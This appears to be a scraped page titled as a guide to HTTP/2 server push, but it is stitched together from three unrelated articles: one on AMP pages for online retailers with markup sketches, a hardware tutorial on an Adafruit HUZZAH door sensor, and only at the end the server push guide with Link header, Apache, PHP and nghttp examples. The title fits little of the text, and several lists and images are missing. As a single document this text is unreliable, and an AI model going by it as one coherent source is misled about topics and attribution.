A Comprehensive Guide To HTTP/2 Server Push
Jeremy Wagner’s complete guide to HTTP/2 Server Push, what it is and how to use it.
Big news from Google: Within a few months, the infamous search engine will divide its index1 to give users better and fresher content. The long-term plan is to make the mobile search index the primary one. Why does this matter for e-commerce website owners?
Well, it will enable Google to run its ranking algorithm differently for purely mobile content. This means that mobile content won’t be extracted from desktop content to determine mobile rankings. That’s definitely something that retailers can leverage, thanks to AMP. This article outlines how to get started with AMP and how to gain an edge over the competition with your e-commerce website.
So, how do online retailers go about leveraging this big Google announcement? With AMP content! AMP (Accelerated Mobile Pages) just celebrated its one-year anniversary. It is an open-source project supported by Google that aims to reduce page-loading times on mobile. AMP pages are similar to HTML pages, with a few exceptions: Some tags are different, some rules are new, and there are plenty of restrictions on the use of JavaScript and CSS.
AMP pages get their own special carousel in Google mobile search results. No official statement has been made yet about whether these AMP pages will be getting an SEO boost.
While initially geared to blogs and news websites, AMP has introduced components that make it easy to adapt to an e-commerce website. To date, more than 150 million AMP documents are in Google’s index, with over 4 million being added every week. AMP isn’t meant purely for mobile traffic; it renders well on mobile, tablet and desktop. The AMP project’s website9 is actually coded in AMP HTML, in case you are curious to see what AMP looks like on a desktop. eBay was one of the most notable early adopters in the e-commerce realm; by July 2016, it took more than 8 million product pages live in AMP format and plans on going further.
Google is touting a reduction of 15 to 85% in page-loading time on mobile. The main appeal of AMP for retailers is speed, because slow loading times kill conversions. Selling products to people when they want them makes a huge difference to a business’ bottom line. Many shoppers will go to a competitor’s website if yours is too slow to load. Put that in a mobile context, and a slow loading time means losing 40% of visitors — potential customers who will take their dollars elsewhere.
In brick and mortar stores, shop fronts are a big deal in attracting customers. It’s the same online, except that your storefront is supported by the speed of your customers’ Internet connection and the visibility you get on various channels (such as search engines, social media and email). Visibility is another way retailers can leverage AMP, and it is a major element of the AMP equation. This is especially true in countries with limited mobile broadband speed. And before you think this particular challenge is exclusive to developing nations, keep in mind that the US is not ranked in the top 10 countries in mobile broadband speed.
AMP pages feel like they load blazingly fast. Here’s a comparison:
User experience is central to most online retailers. A slow website with bloated code, an overwrought UI and plenty of popups is everyone’s nightmare, especially on a mobile device.
The “mobile-friendly” label was introduced by Google in late 2014 as an attempt to encourage websites to ensure a good mobile user experience. After widespread adoption of responsive design, the mobile-friendly label is being retired by Google in favor of the AMP label.
AMP pages could be featured in a carousel and are labelled with a dedicated icon, highlighting them in search results. The search giant has recently stated that AMP would take precedence over other mobile-friendly alternatives such as in-app indexing. However, AMP is still not a ranking signal, according to Google Webmaster Trends analyst John Mueller.
Media queries adapt the presentation of content to the device. However, the content of the page itself isn’t affected. In contrast, AMP helps make mobile web pages truly fast to load, but at a cost. Developers, designers and marketers will have to learn how to create beautiful web pages that convert using a subset of HTML with a few extensions.
The premise of AMP14 is that mobile-optimized content should load instantly anywhere. It’s a very accessible framework for creating fast-loading mobile web pages. However, compatibility with the AMP format is not guaranteed for all types of websites. This is one of the realities of a constantly evolving project such as AMP. The good news is that many of the arguments against AMP for online retailers no longer hold up.
AMP pages are now able to handle e-commerce analytics thanks to the amp-analytics variable. With this variable, statistics are available to analyze an AMP page’s performance in terms of traffic, revenue generated, clickthrough rate and bounce rate. According to the AMP project’s public roadmap15, better mobile payments are planned, after the addition of login-based access, slated for the fourth quarter of 2016.
Product and listing pages are supported in AMP, and they show great potential to add real value to the online customer journey. Keep in mind that 40% of users will abandon a website if it takes longer than 3 seconds to load16. Worse yet, 75% of consumers would rather visit a competitor website than deal with a slow-loading page.
Some of the drawbacks that have been noted are mostly due to the fact that AMP for e-commerce is rather new. There are a few concerns about the quality of the user experience offered by AMP e-commerce pages because some e-commerce functionality is not yet available, such as search bars, faceted search filters, login and cart features. However, frequent updates to the AMP format are planned, so this shouldn’t be a deterrent to those looking to implement it.
There has been some grumbling about the format among marketers. AMP relies on simplified JavaScript and CSS. As a consequence, tracking and advertising on AMP pages is less sophisticated than on traditional HTML pages. That being said, the main drawback is that implementing AMP pages effectively will take time and effort. The code is proprietary, heavily restricts JavaScript (iframes are not allowed, for example) and even limits CSS (with some properties being outright banned).
To ensure that your website is AMP-compliant20, check the instructions provided in the AMP project’s documentation21. Keep in mind that AMP pages should be responsive22 or mobile-friendly. A best practice would be to test the implementation of AMP pages against your current mobile website using a designated subset of pages. This will give you a sample to determine whether AMP adds value to your business.
You don’t have to make your entire website AMP-compliant. Start upgrading the website progressively: Pick simple static-content pages first, such as product pages, and then move on to other types of content. This way, you can target highly visible pages in SEO results, which will lead to a big payoff for the website without your having to deal with pages that require advanced functionality not yet supported by AMP.
If your website uses a popular CMS, then becoming AMP-compliant could be as easy as installing a plugin.
Let’s break down the process according to the customer journey. AMP offers a selection of prebuilt components to help you craft an enjoyable user experience on an e-commerce website (along with some evolving tools to help you collect data in order to improve it). You can implement four major AMP elements along key points in the customer’s purchasing journey, including on the home page, browsing pages, landing pages, product pages and related product widgets:
The entire purchasing flow can’t be 100% AMP-compliant yet, so you’ll have to plan a gateway to a regular non-AMP page for ordering and completing purchases.
Users will often start their purchasing journey on a website’s home page or a product category page, because these pages are prominent in search engine results. These pages are great candidates for AMP, as eBay has shown25 by making many of its category pages AMP-compliant. Typically, category pages are static and showcase products for sale. The amp-carousel feature26 offers a way to browse other products in a mobile-optimized way. These products can be organized into subcategories that fit the user’s needs. You can view the annotated code to create a product page over on AMP by Example27.
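To give a sense of what the amp-carousel feature involves, here is a minimal sketch; it is not taken from the article, and the image paths and dimensions are placeholders:

```html
<!-- Sketch only: image paths and sizes are placeholders. -->
<!-- Requires the amp-carousel component script in the document head:
     <script async custom-element="amp-carousel"
             src="https://cdn.ampproject.org/v0/amp-carousel-0.1.js"></script> -->
<amp-carousel width="400" height="300" layout="responsive" type="slides">
  <amp-img src="/img/product-1.jpg" width="400" height="300" alt="Product 1"></amp-img>
  <amp-img src="/img/product-2.jpg" width="400" height="300" alt="Product 2"></amp-img>
  <amp-img src="/img/product-3.jpg" width="400" height="300" alt="Product 3"></amp-img>
</amp-carousel>
```

With `type="slides"`, one product is shown at a time and the user swipes between them; omitting it produces a free-scrolling strip instead.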
After browsing to a category page, the next step for our user would be to find an interesting product and click on it. In an AMP-compliant flow, this would lead the user to an AMP product page.
Your AMP product page could include the following:
- image and video galleries, via the amp-carousel and amp-video elements;
- collapsible product details, via the amp-accordion tag;
- social sharing buttons, which enable the user to easily share the product’s URL via the amp-social-share element;
- off-canvas navigation, via amp-sidebar.

Here is a preview of what the AMP carousel looks like on mobile:
Showing related products36 benefits the retailer’s bottom line and the user’s experience. The first product that a user browses to isn’t always the one that fits their need. You can show related products in AMP in two ways:
- Use amp-list to fire a CORS request to a JSON endpoint that supplies the list of related products. These related products can be populated in an amp-mustache template on the client. This approach is personalized because the content is dynamically generated server-side for each request.

Personalization is a big deal in e-commerce because it increases conversions. To dip into personalization in the AMP format, you can leverage the amp-access component to display different blocks of content according to the user’s status. To make it all work, you have to follow the same method as we did with the amp-list component: Fire a request at a JSON endpoint, and then present the data in an amp-mustache template. Keep in mind that personalization doesn’t have a leg to stand on without reliable data. Google has been actively extending the tracking options available in AMP.
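To make the amp-list approach concrete, here is a minimal sketch; the endpoint URL and the JSON field names (items, name, price, image) are assumptions for illustration, not part of the article:

```html
<!-- Sketch only: the endpoint and field names are hypothetical. -->
<!-- Requires the amp-list and amp-mustache component scripts in the document head. -->
<amp-list layout="fixed-height" height="300"
    src="https://www.example.com/api/related-products.json">
  <template type="amp-mustache">
    <div class="related-product">
      <amp-img src="{{image}}" width="100" height="100" alt="{{name}}"></amp-img>
      <p>{{name}}: {{price}}</p>
    </div>
  </template>
</amp-list>
```

By default, amp-list iterates over an items array in the JSON response, so the endpoint would return something like {"items": [{"name": "…", "price": "…", "image": "…"}]}.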
You can track users at an aggregate level using the amp-analytics component; AMP supports several analytics vendors.
Sidenote: In case you see cdn.ampproject.org in your Google Analytics data, this is normal for AMP pages; cdn.ampproject.org is a cache that belongs to Google. No need to worry about this strange newcomer to your Google Analytics data!
AMP now supports some analytics products, such as Adobe’s and Google’s own. The type attribute will quickly configure the respective product within the code. Here’s an example of type being used for Google Analytics:
<amp-analytics type="googleanalytics">
And here are the types for some of the most common analytics vendors:
- adobeanalytics
- googleanalytics
- segment
- webtrekk
- metrika

Google Tag Manager has taken AMP support one step further with AMP containers. You can now create a container for your AMP pages.
More than 20 tag types are available out of the box, including third-party vendor tags. Alongside a wider selection of tags, Google has provided built-in variables dedicated to AMP tracking, making it easier for marketers and developers to tag their pages.
If you are not using Google Tag Manager, you can implement your tag management service in one of two ways:
- as an endpoint that receives data directly from amp-analytics and conducts marketing management in the back end;
- as a remote config that amp-analytics loads from your tag management service.

The endpoint approach is the same as the standard approach. The config approach consists of creating a unique configuration for amp-analytics that is specific to each publisher and that includes all of the publisher’s compatible analytics packages. A publisher would configure it using a syntax like this:
<amp-analytics config="https://your-dream-tag-manager.example.com/user-id.json">
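The remote configuration is a JSON document in the standard amp-analytics format. A minimal sketch might look like this; the collection endpoint is hypothetical:

```json
{
  "requests": {
    "pageview": "https://analytics.example.com/collect?url=${canonicalUrl}"
  },
  "triggers": {
    "trackPageview": {
      "on": "visible",
      "request": "pageview"
    }
  }
}
```

Here, `${canonicalUrl}` is one of the variables that amp-analytics substitutes at request time, and the `visible` trigger fires once the page becomes visible to the user.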
Many online retailers rely on advertising or showing related products throughout their website to boost revenue. The AMP format is bootstrapped to show ads through <amp-ad> and <amp-embed>. The documentation is quite clear on how to implement ads, and the good news is that a wide variety of networks are already supported. Although iframes are not allowed in AMP, two embed types support ads with <amp-embed>: Taboola and Zergnet. If you plan on using ads in AMP, follow the principles laid out in the documentation in your development work.
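For illustration, an <amp-ad> slot for a supported network might be declared like this; the network type and slot path below are placeholders, not a recommendation from the article:

```html
<!-- Sketch only: the ad network and slot path are placeholders. -->
<amp-ad width="300" height="250"
    type="doubleclick"
    data-slot="/1234567/example-slot">
</amp-ad>
```

Each network defines its own data-* attributes, so check the documentation for the network you actually use.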
The previous step was a tricky one because it entails maintaining a seamless user experience while the user transitions to a full HTML page. The process should be fast and consistent for the user. An experience that isn’t consistent with the preceding AMP journey could hurt conversions. If your website is a progressive web app, then amp-install-serviceworker49 is an ideal way to bridge both types of pages within the customer journey, because it allows your AMP page to install a service worker on your domain, regardless of where the user is viewing the AMP page. This means that caching content from your progressive web app can be done preemptively to ensure that the transition is smooth for the customer, because all of the content needed is cached in advance. An easy way to experience the entire AMP e-commerce experience is to head on over to eBay50; see how the company handles the transition from AMP to an HTML checkout process.
AMP works within a smart caching model that enables platforms that refer traffic to AMP pages to use caching and prerendering in order to load web pages super-fast. Be aware of this when analyzing traffic and engagement, because you might see less traffic to your own origin, where your AMP pages are originally hosted (this is why we referred to cdn.ampproject.org in Google Analytics data). The balance of traffic will most likely show up through proxied versions of your pages served by AMP caches.
A whole host of useful resources are available if you have any questions:
eBay has shared its experience57 in implementing AMP for its own e-commerce platform:
Mind you, there are some complex parts:
- Granular tracking is limited to the amp-analytics component. The component can be configured in various ways, but it is still not sufficient for the granular tracking needs of most online retailers.

However, once you get past the internal hurdles, the payoff can be great. Check out the examples provided by eBay for camera drones and the Sony PlayStation. (Use a mobile device, of course, otherwise you will be redirected to the desktop version.)
SEO experts are pushing for AMP adoption because some see it as a mobile-visibility asset to be leveraged. Here are some SEO points to ensure you get the most out of AMP:
- Link your pages both ways: add a <link rel="canonical" href="[canonical URL]" /> tag on the AMP page and <link rel="amphtml" href="[AMP URL]" /> on the regular page. For a standalone AMP page (one that doesn’t have a non-AMP version), specify it as the canonical version: <link rel="canonical" href="https://www.example.com/url/to/amp-document.html" />.
- A common URL convention is to add /amp/ to the path of the URL.

An e-commerce website can’t be 100% compliant with AMP, but there are benefits to adopting the format early on. Online retailers looking for an edge against fierce competition might be wise to turn to this format to grab the attention of mobile customers and nudge open their wallets. More and more websites are converting to the AMP format to increase or maintain their mobile traffic. For an online retailer that has a multi-channel or mobile-first strategy to acquire and retain customers, AMP might be a great way to future-proof their online marketing efforts.
The world is constantly evolving with frameworks, such as the Internet of Things (IoT) and virtual reality (VR). These and many others are opening opportunities to rethink how we approach prototyping: They introduce avenues to marry the digital software with the tangible aspect of the overall user engagement.
This two-article series will introduce readers of different backgrounds to prototyping IoT experiences with minimum code knowledge, starting with affordable proof of concept platforms, before moving to costly commercial offerings.
We will do this by going over a personal experience I had as a user experience designer while learning the basics of an IoT platform named “Adafruit IO”. This will be a nice introductory case study.
The following are some assumptions about you:
Disclaimer: I am not an electronics engineer or a developer. Please always be careful when exploring electricity and hardware. This tutorial is meant to inspire you to do additional research before finding what works for your circumstances!
If this sounds appealing, let’s dive into part 1!
IoT talk is sometimes unnecessarily complex. To reduce the jargon, I will use some reader-friendly terms, as defined below.
On a cold winter day, I read an article on smart homes being the future, which immediately inspired me to turn my home into a smart one. This translated into several commercial product purchases, including devices from the Nest family, which only whetted my appetite.
Controlling my air conditioning and furnace and detecting possible carbon monoxide emissions were not enough! I wanted to go further by having monitoring capabilities over my home security. This includes:
Getting to the point of picking Adafruit IO as the solution was not a simple journey. Before deciding on that platform and the HUZZAH ESP8266 board, I tried several other solutions, with varying success:
My vision was to have multiple sensors that could be viewed and controlled from a computer or mobile device independently at any time. To accomplish this, I needed both a Wi-Fi-enabled hardware board and a software platform that could talk to it and any attached sensors.
I decided to be more strategic in my choices, so I came up with a list of criteria, in order of priority:
After exploring the three approaches mentioned further above, I ruled out the following additional equipment, based on the five criteria. Keep in mind that I am giving you the high-level details — a whole article could be written on selecting a board!
| Board | What it is | Why I ruled it out |
|---|---|---|
| Arduino Yun10 | Offers both wired and wireless Internet connectivity, expandable RAM and onboard memory. The board has a Linux-based distribution, making it a powerful networked computer. | The price of the controller ($69) and the bulky size proved to be too limiting. Also, I didn’t need something so powerful. I ended up buying one to test out for a garden watering project. |
| Raspberry Pi 3 Model B11 | In addition to offering wired and wireless connectivity, it has HDMI and audio ports, Bluetooth integration and support for use of a custom-sized SD card with different operating systems. | While I could load a Linux-based operating system and use the Python language to accomplish anything, that’s not what I needed. I ended up using this platform for other projects. The $40 price tag and the bulky size were also limiting factors. |
| Raspberry Pi Zero12 | This $5 board packs a big punch. The powerful CPU and large RAM made it a strong contender, as did the small size and large number of GPIO pins. | Two things nixed this board. It doesn’t have on-board Wi-Fi, and so requires additional equipment. And because it is very popular, finding this board is hard. In the US, it is sold only at Micro Center13, which limits it to one per home per month. (Note: At the time of writing v1.3 of the board with on board Wi-Fi and Bluetooth was not yet available.) |
Side note: For more information on choosing a board for your hardware prototyping project, you can consult the excellent “Makers’ Guide to Boards14.”
Further researching led me to Adafruit’s HUZZAH ESP826615 board, which is but one variation of the ESP8266 chipset; there are others, such as the NodeMCU LUA16. Each has unique capabilities, so choose wisely. Here is why I selected the HUZZAH:
Deciding to start small, I wanted to build a sensor that tracks whether a door is open. The rest of this first article will focus on the hardware for this use case, but much of the wiring will scale to other types of sensors.
I am assuming you already have the following lying around: a computer, solder wire and a soldering-iron cleaner.
Total: $30 to $40 on average (using US parts)
Before getting to the details of how to put the rig together, let’s talk about what the goal is. By the end of this first article, you should have something similar to what you see below. With this setup, you will have a mini-computer (the board) capable of collecting sensor data from your environment and communicating it to the cloud (Adafruit IO) over Wi-Fi.

The first step is to assemble the HUZZAH board by soldering on its pin headers, including both the board leg headers and the FTDI header. Adafruit has a step-by-step tutorial30 on this.
When you are soldering the first leg header, ensure that the board is not tilting one way, which would result in the pins being soldered at an angle. A trick I used is to put a bit of putty under the board to even it out as it is being plugged into the breadboard.
Once you have soldered all of the headers, insert the board in the breadboard with the antenna (the wavy gold line) facing outwards.
Insert the supply at the opposite end of the breadboard, with the top and bottom legs fitting in the + and – breadboard rails. This is how power will be passed to the breadboard.
Next, set the yellow jumpers for both rails to 3.3 volts, which is the voltage used by the HUZZAH board.
Note: Depending on your breadboard, the – and + might not match the alignment of the power supply jumpers. That’s fine as long as you remember that the power supply dictates which breadboard rail carries which electrical signal!
Connect the HUZZAH board to the power:
Connecting the sensor is very easy:



If you are curious to learn how reed switches operate, Chris Woodford has more information34 on the subject.
As a last step, plug the 9-volt adapter into a power outlet, then into the breadboard power supply. Push the white button. If everything is correctly wired, you should see several lights flicker on, including for the power supply (the green one), the board power (red), the Wi-Fi (blue) and the sensor (red if the magnet is touching the sensor).
At this point, you can start writing the code for the rig, but I find this is a good opportunity to test the mounting of the container box. This is not a permanent mounting, but a trial run to gauge the rig’s overall dimensions and the best fit. Before doing that, you need to take a few preparatory steps.
Step 1: Using your soldering iron, melt one hole in the left side of the container for the power adapter plug, and three smaller ones on the right for the individual sensor wires.
Warning: Make sure to do this in a well-ventilated area, so that you don’t breathe in fumes. After that, clean your soldering iron’s tip with a nonabrasive sponge.


Step 2: Put the entire rig in the container, and pass the cables through the holes.

Step 3: Close the container, and mount it on the wall with the putty. Tapes of various types won’t work well. Alternatively, you could punch holes in the bottom of the container to mount with screws, but make sure they are insulated with electrical tape to avoid short-circuiting any electronics.
I have also tried using hot glue. I find it messy, but it is not much more expensive, and you can pick a glue gun up on the cheap if you prefer that method.


Step 4: Use a combination of LEGO pieces and putty to mount the sensor and the accompanying magnet to the door.

Now that the rig is all wired up, you can connect to it with the FTDI cable and start adding the code that will make the sensor work.
In this first article of our two-part series, we’ve identified the problem (home security), assessed the merit of an IoT setup, and discussed the rationale involved in selecting a particular board. This was followed by a step-by-step guide on how to put together all of the hardware components into a working rig.
In doing so, we’ve learned the basics of electronics. In the second and final article in this series, we will add code to the rig we’ve built here, so that we can start interacting with the environment. Then, we will build custom user interfaces to view the data from anywhere, while discussing at a high level the security implications of the software configuration.
Stay tuned!
The landscape for the performance-minded developer has changed significantly in the last year or so, with the emergence of HTTP/2 being perhaps the most significant of all. No longer is HTTP/2 a feature we pine for. It has arrived, and with it comes server push!
Aside from solving common HTTP/1 performance problems (e.g., head of line blocking and uncompressed headers), HTTP/2 also gives us server push! Server push allows you to send site assets to the user before they’ve even asked for them. It’s an elegant way to achieve the performance benefits of HTTP/1 optimization practices such as inlining, but without the drawbacks that come with that practice.
In this article, you’ll learn all about server push, from how it works to the problems it solves. You’ll also learn how to use it, how to tell if it’s working, and its impact on performance. Let’s begin!
Accessing websites has always followed a request and response pattern. The user sends a request to a remote server, and with some delay, the server responds with the requested content.
The initial request to a web server is commonly for an HTML document. In this scenario, the server replies with the requested HTML resource. The HTML is then parsed by the browser, where references to other assets are discovered, such as style sheets, scripts and images. Upon their discovery, the browser makes separate requests for those assets, which are then responded to in kind.
The problem with this mechanism is that the browser can’t discover and retrieve critical assets until after the HTML document has been downloaded and parsed. This delays rendering and increases load times.
With server push, we have a solution to this problem. Server push lets the server preemptively “push” website assets to the client without the user having explicitly asked for them. When used with care, we can send what we know the user is going to need for the page they’re requesting.
Let’s say you have a website where all pages rely on styles defined in an external style sheet named styles.css. When the user requests index.html from the server, we can push styles.css to the user just after we begin sending the response for index.html.
Rather than waiting for the server to send index.html and then waiting for the browser to request and receive styles.css, the user only has to wait for the server to respond with both index.html and styles.css on the initial request. This means that the browser can begin rendering the page sooner than if it had to request styles.css separately.
As you can imagine, this can decrease the rendering time of a page. It also solves some other problems, particularly in front-end development workflows.
While reducing round trips to the server for critical content is one of the problems that server push solves, it’s not the only one. Server push acts as a suitable alternative for a number of HTTP/1-specific optimization anti-patterns, such as inlining CSS and JavaScript directly into HTML, as well as using the data URI scheme5 to embed binary data into CSS and HTML.
These techniques found purchase in HTTP/1 optimization workflows because they decrease what we call the “perceived rendering time” of a page, meaning that while the overall loading time of a page might not be reduced, the page will appear to load faster for the user. It makes sense, after all. If you inline CSS into an HTML document within <style> tags, the browser can begin applying styles immediately to the HTML without waiting to fetch them from an external source. This concept holds true with inlining scripts and inlining binary data with the data URI scheme.

Seems like a good way to tackle the problem, right? Sure — for HTTP/1 workflows, where you have no other choice. The poison pill we swallow when we do this, however, is that the inlined content can’t be efficiently cached. When an asset like a style sheet or JavaScript file remains external and modular, it can be cached much more efficiently. When the user navigates to a subsequent page that requires that asset, it can be pulled from the cache, eliminating the need for additional requests to the server.
When we inline content, however, that content doesn’t have its own caching context. Its caching context is the same as the resource it’s inlined into. Take an HTML document with inlined CSS, for instance. If the caching policy of the HTML document is to always grab a fresh copy of the markup from the server, then the inlined CSS will never be cached on its own. Sure, the document that it’s a part of may be cached, but subsequent pages containing this duplicated CSS will be downloaded repeatedly. Even if the caching policy is more lax, HTML documents typically have limited shelf life. This is a trade-off that we’re willing to make in HTTP/1 optimization workflows, though. It does work, and it’s quite effective for first-time visitors. First impressions are often the most important.
These are the problems that server push addresses. When you push assets, you get the practical benefits that come with inlining, but you also get to keep your assets in external files that retain their own caching policy. There is a caveat to this point, though, and it’s covered toward the end of this article. For now, let’s continue.
I’ve talked enough about why you should consider using server push, as well as the problems that it fixes for both the user and the developer. Now let’s talk about how it’s used.
Using server push usually involves using the Link HTTP header, which takes on this format:
Link: </css/styles.css>; rel=preload; as=style
Note that I said usually. What you see above is actually the preload resource hint9 in action. This is a separate and distinct optimization from server push, but most (not all) HTTP/2 implementations will push an asset specified in a Link header containing a preload resource hint. If either the server or the client opts out of accepting the pushed resource, the client can still initiate an early fetch for the resource indicated.
The as=style portion of the header is not optional. It informs the browser of the pushed asset’s content type. In this case, we use a value of style to indicate that the pushed asset is a style sheet. You can specify other content types10. It’s important to note that omitting the as value can result in the browser downloading the pushed resource twice. So don’t forget it!
Now that you know how a push event is triggered, how do we set the Link header? You can do so through two routes:
1. your web server’s configuration (e.g., Apache’s httpd.conf or .htaccess);
2. back-end code (e.g., PHP’s header function).

Link Header in Your Server Configuration

Here’s an example of configuring Apache (via httpd.conf or .htaccess) to push a style sheet whenever an HTML file is requested:
<FilesMatch ".html$">
    Header set Link "</css/styles.css>; rel=preload; as=style"
</FilesMatch>
Here, we use the FilesMatch directive to match requests for files ending in .html. When a request comes along that matches this criteria, we add a Link header to the response that tells the server to push the resource at /css/styles.css.
Side note: Apache’s HTTP/2 module can also initiate a push of resources using the H2PushResource directive. The documentation for this directive states that this method can initiate pushes earlier than if the Link header method is used. Depending on your specific setup, you may not have access to this feature. The performance tests shown later in this article use the Link header method.
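If your Apache build does expose the directive, a sketch of the H2PushResource approach might look like this; the location and asset paths are illustrative:

```apache
# Sketch only: push these assets whenever /index.html is served over HTTP/2.
<Location /index.html>
    H2PushResource /css/styles.css
    H2PushResource /js/scripts.js
</Location>
```

Unlike the Link header method, this hands the push decision to mod_http2 directly, which is why it can begin pushing earlier in the request cycle.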
As of now, Nginx doesn’t support HTTP/2 server push, and nothing so far in the software’s changelog has indicated that support for it has been added. This may change as Nginx’s HTTP/2 implementation matures.
Setting the Link Header in Back-End Code

Another way to set a Link header is through a server-side language. This is useful when you aren’t able to change or override the web server’s configuration. Here’s an example of how to use PHP’s header function to set the Link header:
header("Link: </css/styles.css>; rel=preload; as=style");
If your application resides in a shared hosting environment where modifying the server’s configuration isn’t an option, then this method might be all you’ve got to go on. You should be able to set this header in any server-side language. Just be sure to do so before you begin sending the response body, to avoid potential runtime errors.
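As a precaution, you can check whether any output has already been sent before attempting to set the header. A minimal sketch in PHP (the asset path is a placeholder):

```php
<?php
// header() only works before any of the response body has been sent;
// calling it afterwards raises a warning and the header is ignored.
if (!headers_sent()) {
    header("Link: </css/styles.css>; rel=preload; as=style");
}
```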
All of our examples so far only illustrate how to push one asset. What if you want to push more than one? Doing that would make sense, right? After all, the web is made up of more than just style sheets. Here’s how to push multiple assets:
Link: </css/styles.css>; rel=preload; as=style, </js/scripts.js>; rel=preload; as=script, </img/logo.png>; rel=preload; as=image
When you want to push multiple resources, just separate each push directive with a comma. Because resource hints are added via the Link tag, this syntax is how you can mix in other resource hints with your push directives. Here’s an example of mixing a push directive with a preconnect resource hint:
Link: </css/styles.css>; rel=preload; as=style, <https://fonts.gstatic.com>; rel=preconnect
Multiple Link headers are also valid. Here’s how you can configure Apache to set multiple Link headers for requests to HTML documents:
<FilesMatch "\.html$">
    Header add Link "</css/styles.css>; rel=preload; as=style"
    Header add Link "</js/scripts.js>; rel=preload; as=script"
</FilesMatch>
This syntax is more convenient than stringing together a bunch of comma-separated values, and it works just the same. The only downside is that it’s not quite as compact, but the convenience is worth the few extra bytes sent over the wire.
Now that you know how to push assets, let’s see how to tell whether it’s working.
So, you’ve added the Link header to tell the server to push some stuff. The question that remains is, how do you know if it’s even working?
This varies by browser. Recent versions of Chrome will reveal a pushed asset in the initiator column of the network utility in the developer tools.
Furthermore, if we hover over the asset in the network request waterfall, we’ll get detailed timing information on the asset’s push:
Firefox is less obvious in identifying pushed assets. If an asset has been pushed, its status in the network utility of the browser’s developer tools is shown with a gray dot.
If you’re looking for a definitive way to tell whether an asset has been pushed by the server, you can use the nghttp command-line client to examine a response from an HTTP/2 server, like so:
nghttp -ans https://jeremywagner.me
This command will show a summary of the assets involved in the transaction. Pushed assets will have an asterisk next to them in the program output, like so:
id  responseEnd  requestStart  process  code  size  request path
 13    +50.28ms       +1.07ms  49.21ms   200    3K  /
  2    +50.47ms *    +42.10ms   8.37ms   200    2K  /css/global.css
  4    +50.56ms *    +42.15ms   8.41ms   200   157  /css/fonts-loaded.css
  6    +50.59ms *    +42.16ms   8.43ms   200   279  /js/ga.js
  8    +50.62ms *    +42.17ms   8.44ms   200   243  /js/load-fonts.js
 10    +74.29ms *    +42.18ms  32.11ms   200    5K  /img/global/jeremy.png
 17    +87.17ms      +50.65ms  36.51ms   200   668  /js/lazyload.js
 15    +87.21ms      +50.65ms  36.56ms   200    2K  /img/global/book-1x.png
 19    +87.23ms      +50.65ms  36.58ms   200   138  /js/debounce.js
 21    +87.25ms      +50.65ms  36.60ms   200   240  /js/nav.js
 23    +87.27ms      +50.65ms  36.62ms   200   302  /js/attach-nav.js
Here, I’ve used nghttp on my own website, which (at least at the time of writing) pushes five assets. The pushed assets are marked with an asterisk on the left side of the requestStart column.
Now that we can identify when assets are pushed, let’s see how server push actually affects the performance of a real website.
Measuring the effect of any performance enhancement requires a good testing tool. Sitespeed.io is an excellent tool available via npm; it automates page testing and gathers valuable performance metrics. With the appropriate tool chosen, let’s quickly go over the testing methodology.
I wanted to measure the impact of server push on website performance in a meaningful way. In order for the results to be meaningful, I needed to establish points of comparison across six separate scenarios. These scenarios are split across two facets: whether HTTP/2 or HTTP/1 is used. On HTTP/2 servers, we want to measure the effect of server push on a number of metrics. On HTTP/1 servers, we want to see how asset inlining affects performance in the same metrics, because inlining is supposed to be roughly analogous to the benefits that server push provides. Specifically, these scenarios are the following:

- HTTP/2 with no assets pushed;
- HTTP/2 with only the CSS pushed;
- HTTP/2 with as many assets pushed as practical;
- HTTP/1 with no assets inlined;
- HTTP/1 with only the CSS inlined;
- HTTP/1 with as many assets inlined as practical.
In each scenario, I initiated testing with the following command:
sitespeed.io -d 1 -m 1 -n 25 -c cable -b chrome -v https://jeremywagner.me
If you want to know the ins and outs of what this command does, you can check out the documentation. The short of it is that this command tests my website’s home page at https://jeremywagner.me with the following conditions:

- the website is crawled one page deep (-d 1 and -m 1);
- the page is tested 25 times (-n 25);
- a cable-like connection profile is emulated (-c cable);
- Chrome is used as the testing browser (-b chrome).
Three metrics were collected and graphed from each test:

- first paint time: the point at which the browser paints the first visible content;
- DOMContentLoaded time: the point at which the HTML document has been fully parsed (using the async attribute on <script> tags can help to prevent parser blocking);
- page-load time: the point at which the page has finished loading.

With the parameters of the test determined, let’s see the results!
Tests were run across the six scenarios specified earlier, with the results graphed. Let’s start by looking at how first paint time is affected in each scenario:
Let’s first talk a bit about how the graph is set up. The portion of the graph in blue represents the average first paint time. The orange portion is the 90th percentile. The grey portion represents the maximum first paint time.
Now let’s talk about what we see. The slowest scenarios are both the HTTP/2- and HTTP/1-driven websites with no enhancements at all. We do see that using server push for CSS helps to render the page about 8% faster on average than if server push is not used at all, and even about 5% faster than inlining CSS on an HTTP/1 server.
When we push all assets that we possibly can, however, the picture changes somewhat. First paint times increase slightly. In HTTP/1 workflows where we inline everything we possibly can, we achieve performance similar to when we push assets, albeit slightly less so.
The verdict here is clear: With server push, we can achieve results that are slightly better than what we can achieve on HTTP/1 with inlining. When we push or inline many assets, however, we observe diminishing returns.
It’s worth noting that either using server push or inlining is better than no enhancement at all for first-time visitors. It’s also worth noting that these tests and experiments are being run on a website with small assets, so this test case may not reflect what’s achievable for your website.
Let’s examine the performance impacts of each scenario on DOMContentLoaded time:
The trends here aren’t much different from what we saw in the previous graph, except for one notable departure: The instance in which we inline as many assets as practical on an HTTP/1 connection yields a very low DOMContentLoaded time. This is presumably because inlining reduces the number of assets that need to be downloaded, which allows the parser to go about its business without interruption.
Now, let’s look at how page-loading times are affected in each scenario:
The established trends from earlier measurements generally persist here as well. I found that pushing only the CSS realized the greatest benefit to loading time. Pushing too many assets could, on some occasions, make the web server a bit sluggish, but it was still better than not pushing anything at all. Server push also yielded better overall loading times than inlining did.
Before we conclude this article, let’s talk about a few caveats you should be aware of when it comes to server push.
Server push isn’t a panacea for your website’s performance maladies. It has a few drawbacks that you need to be cognizant of.
In one of the scenarios above, I am pushing a lot of assets, but altogether they represent a small portion of the overall data. Pushing a lot of very large assets at once could actually delay your page from painting or being interactive sooner, because the browser needs to download not only the HTML, but all of the other assets that are being pushed alongside it. Your best bet is to be selective in what you push. Style sheets are a good place to start (so long as they aren’t massive). Then evaluate what else makes sense to push.
You can also push assets for pages that the user hasn’t requested yet. This is not necessarily a bad thing if you have visitor analytics to back up this strategy. A good example of this may be a multi-page registration form, where you push assets for the next page in the sign-up process. Let’s be crystal clear, though: If you don’t know whether you should force the user to preemptively load assets for a page they haven’t seen yet, then don’t do it. Some users might be on restricted data plans, and you could be costing them real money.
